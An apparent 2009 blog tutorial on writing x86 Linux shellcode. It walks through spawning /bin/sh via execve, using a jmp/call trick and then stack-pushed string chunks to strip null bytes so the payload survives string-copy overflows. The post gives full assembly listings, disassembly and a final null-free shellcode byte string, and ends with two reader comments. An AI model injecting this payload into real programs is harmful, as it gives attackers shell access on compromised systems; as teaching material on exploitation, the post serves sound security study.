Thursday, February 26, 2009

asm: writing shellcode/getting rid of data section and nulls

Most probably you want your shellcode to execute "/bin/sh" on target box. Here you have to deal somehow with string, which in normal programs is stored in data section.

The problem you may face when you are writing a shellcode is that you can't just use data section in your shellode - your shellcode and target application use different data sections.

First of all I've tried to use call instruction. When processor executes call it automatically puts address of the next instruction into esp register. We can use this "feature" keeping in mind that call works with addresses, that means that we can use address of instruction rather than function's.
Let's look at the code below

1 
 2 .global main
 3 
 4 main:
 5     jmp     two
 6 one:
 7     movl    (%esp), %ebx
 8     xor     %eax, %eax 
 9     
10     pushl   %eax
11     pushl   %ebx
12     movl    %esp, %ecx
13     
14     xorl    %edx, %edx
15     
16     movl    $11, %eax 
17     int     $0x80
18 two:
19     call    one
20     .string "/bin/sh"
Just in the beginning processor jumps to label two. Then it executes call: puts address of the next instruction and jumps to label one. Here is the most interesting part. The address of the "next instruction" after the "call one" is our string.
So when we are already in label one we have address of the string "/bin/sh" in esp.
Then the code prepares registers for system call execve. Number of syscall execve(11) to eax, path to executable to ebx, argv array to ecx and envp array to edx. argv array I simulated with pushing values to stack and putting address of the top of the stack to ebx, I don't push any environment variables, so %edx is null.

This code is valid and will execute /bin/sh if you compile it and execute.
(~~) gcc test.s -o test 
(~~) ./test 
sh-3.2#
The problem here is that it contains nulls:
080483b4 <main>:
 80483b4: eb 12                 jmp    80483c8 <two>

080483b6 <one>:
 80483b6: 8b 1c 24              mov    (%esp),%ebx
 80483b9: 31 c0                 xor    %eax,%eax
 80483bb: 50                    push   %eax
 80483bc: 53                    push   %ebx
 80483bd: 89 e1                 mov    %esp,%ecx
 80483bf: 31 d2                 xor    %edx,%edx
 80483c1: b8 0b 00 00 00        mov    $0xb,%eax
 80483c6: cd 80                 int    $0x80

080483c8 <two>:
 80483c8: e8 e9 ff ff ff        call   80483b6 <one>
 80483cd: 2f                    das    
 80483ce: 62 69 6e              bound  %ebp,0x6e(%ecx)
 80483d1: 2f                    das    
 80483d2: 73 68                 jae    804843c <__libc_csu_init+0x4c>
 80483d4: 00 90 90 90 90 90     add    %dl,-0x6f6f6f70(%eax)
 80483da: 90                    nop    
 80483db: 90                    nop    
 80483dc: 90                    nop    
 80483dd: 90                    nop    
 80483de: 90                    nop    
 80483df: 90                    nop    
Almost all stack overflow attacks uses libc string function to overwrite execution point of function or return point with the chellcode. If shellcode contains null characters it could not be read to the end and the attack will fail.
The "main" null is in our string "/bin/sh". execve doesn't work with not a null-ending strings. I tried to make the string like "/bin/shx" and define it as ascii:
.ascii  "/bin/shx"
and later in runtime override the last character with null but all the time I got segmentation violation alert. I suppose that this is because I was trying to modify read-only section. This became a dead-end for me.
I decided to try another way of defining the string. String after all is an array of bytes. So we can just put these bytes somewhere else is some other representation.
Let's look at the string "/bin/sh" from the other side.
(~~) echo -n "/bin/sh" | hexdump 
0000000 622f 6e69 732f 0068
Aligned to 4 it still contain null, but this is not a problem, we can divide it into 2-bytes chunks:
622f,6e69,732f,68
And now we can use word-long instructions. Let's look at the updated code of our shell program.
1 
 2 .global main
 3 
 4 main:
 5     xor     %eax, %eax
 6     
 7     pushl   %eax
 8     pushw   $0x68
 9     pushw   $0x732f
10     pushw   $0x6e69
11     pushw   $0x622f
12     
13     movl    %esp, %ebx
14     
15     pushl   %eax
16     pushl   %ebx
17     movl    %esp, %ecx
18     
19     xorl    %edx, %edx
20     
21     movl    $11, %eax
22     int     $0x80
I've pushed word-long chunks of the string onto the stack(at first I've pushed zeroed eax to indicate end of string) and put moved address of the head of the stack to ebx. That's almost all. If you still try to compile this code you'd probably find out some zeros. That's because of the movl $11, %eax instruction. 11 could be hold in one byte-long memory node but movl will align memory to 4 bytes with zeros. So just changing from movl to movb will remove this last zero. The latest code should be like
1 
 2 .global main
 3 
 4 main:
 5     xor     %eax, %eax
 6     
 7     pushl   %eax
 8     pushw   $0x68
 9     pushw   $0x732f
10     pushw   $0x6e69
11     pushw   $0x622f
12     
13     movl    %esp, %ebx
14     
15     pushl   %eax
16     pushl   %ebx
17     movl    %esp, %ecx
18     
19     xorl    %edx, %edx
20     
21     movb    $11, %al
22     int     $0x80
Compiling it and obtaining the machine codes I can see there is no zeros there:
080483b4 <main>
 80483b4: 31 c0                 xor    %eax,%eax
 80483b6: 50                    push   %eax
 80483b7: 66 6a 68              pushw  $0x68
 80483ba: 66 68 2f 73           pushw  $0x732f
 80483be: 66 68 69 6e           pushw  $0x6e69
 80483c2: 66 68 2f 62           pushw  $0x622f
 80483c6: 89 e3                 mov    %esp,%ebx
 80483c8: 50                    push   %eax
 80483c9: 53                    push   %ebx
 80483ca: 89 e1                 mov    %esp,%ecx
 80483cc: 31 d2                 xor    %edx,%edx
 80483ce: b0 0b                 mov    $0xb,%al
 80483d0: cd 80                 int    $0x80
The shellcode string will look like
"\x31\xc0\x50\x66\x6a\x68\x66\x68\x2f\x73\x66\x68\x69\x6e\x66"
"\x68\x2f\x62\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"

2 comments:

Geronimo said...

i think you found my stupid program i did awhile back i was trying to understand how movl $11, %eax worked when i started this and could find very little information on this so i was taking a stab in the dark to see how it worked thanks i also learned some other things since then thanks for the information i will treasure it :)

Ni@m said...

Hi Geronimo,
I didn't get what program you are talking about.
Anyway I'm pleased that you've found this post useful for you. Thanks!